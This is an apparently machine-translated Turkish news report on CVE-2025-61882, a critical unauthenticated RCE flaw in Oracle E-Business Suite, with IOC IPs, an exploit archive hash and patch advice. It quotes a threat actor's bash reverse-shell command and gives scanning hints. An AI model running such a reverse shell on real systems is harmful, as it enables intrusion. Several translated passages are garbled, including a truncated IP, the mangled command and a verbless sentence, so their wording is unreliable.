Oracle E-Business Suite’teki kritik bir sıfır günlük güvenlik açığı, kurumsal ortamlar için önemli bir tehdit olarak ortaya çıkmıştır; bu, kavram kanıtı (POC) istismar kodu artık kamuya açıktır.
CVE-2025-61882, maksimum CVSS 3.1 puanı 9.8 ve birden fazla Oracle E-Business Suite sürümlerinde kimlik doğrulaması yapmadan uzaktan kod yürütülmesini sağlayan ciddi bir güvenlik riski sunar.
Güvenlik açığı, Oracle E-Business Suite Sürümleri 12.2.3 ila 12.2.14’ü etkiler ve özellikle HTTP protokolü aracılığıyla Oracle Eşzamanlı İşleme BI Yayıncı Entegrasyon Bileşenini hedefler.
Oracle E-Business Suite RCE Güvenlik Açığı
Güvenlik araştırmacıları, kimlik doğrulanmamış uzak saldırganların düşük saldırı karmaşıklığı ile ağ tabanlı sömürü yoluyla savunmasız sistemlerde keyfi kod yürütmesine izin veren bir kusur belirlediler.
Oracle’ın güvenlik danışmanlığı, güvenlik açığının sınıflandırmasını “kimlik doğrulaması olmadan uzaktan sömürülebilir” olarak vurgular, yani saldırganlar geçerli kimlik bilgileri gerektirmeden ağ erişiminden yararlanabilirler.
Güvenlik Açığı Saldırı Vektörü, kapsam değişmeden kalan ancak gizlilik, dürüstlük ve kullanılabilirlik metrikleri arasında yüksek etki sağlayan HTTP iletişimini kullanır.
Kuruluşlar, son modifiye başlık zaman damgalarını 4 Ekim 2025 ile karşılaştırırken “e-Business Suite ana sayfası” metnini kontrol eden çekirdek algılama şablonlarını kullanarak savunmasız örnekleri tespit edebilir.
Oracle Ekim 2023 Kritik Yama Güncellemesi, gerekli güvenlik yamalarının uygulanması için bir ön koşul görevi görür. Bu eşiğin önündeki modifikasyon tarihleri olan sistemler, sömürüye duyarlı olmayan kurulumları gösterir.
| Risk faktörleri | Detaylar |
| Etkilenen ürünler | Oracle E-Business Suite 12.2.3-12.2.14 |
| Darbe | Uzak Kod Yürütme |
| Önkoşuldan istismar | HTTP protokolü aracılığıyla ağ erişimi, kimlik doğrulama gerekmez |
| CVSS 3.1 puanı | 9.8 (kritik) |
Aktif sömürü
Aktif sömürü girişimleri, kötü amaçlı IP adresleri dahil olmak üzere belirli uzlaşma göstergeleri (IOCS) ile belgelenmiştir.[.]107[.]207[.]26 ve 185[.]181[.]60[.]11 Etkinlikler ve Gönderme Etkinlikleri.
Tehdit aktörleri, kalıcı erişim için giden TCP bağlantıları oluşturmak için SH -C/BIN/BASH -I> &/Dev/TCP // 0> & 1 gibi ters kabuk komutlarını kullanıyor.
Adli analiz, ORACLE_EBS_NDAY_EXPLOIT_POC_SCATERDED_LAPSUS_RETARD_CL0P_HUNTERS.ZIP (SHA-256: 76B6D36E04E367A2334C445B51E1ECCE97E4C614E88DFB4F72B104CA0F31235D) Python Söküm Komut Dosyaları Exp.Py ve Server.py.
Bu araçlar, dağınık örümcek, Lapsus $ ve CL0P fidye yazılımı operasyonlarına referanslar da dahil olmak üzere bilinen tehdit gruplarıyla potansiyel olarak bağlantılı sofistike saldırı metodolojilerini göstermektedir.
Oracle, etkilenen tüm e-iş paketi kurulumlarında yamaların derhal dağıtılmasını şiddetle tavsiye ederek, yalnızca Premier Destek veya Genişletilmiş Destek altındaki sistemlerin güvenlik güncellemeleri aldığını vurgular.
Kuruluşlar, mevcut algılama şablonlarını ve HTML’yi hedefleyen Shodan sorgularını kullanarak kapsamlı güvenlik açığı değerlendirmeleri yaparken belirlenen IOC’ler için ağ izlemesini uygulamalıdır: açıkta kalan örnekleri tanımlamak için “OA_html” kalıpları.
Günlük siber güvenlik güncellemeleri için bizi Google News, LinkedIn ve X’te takip edin. Hikayelerinizi öne çıkarmak için bizimle iletişime geçin.
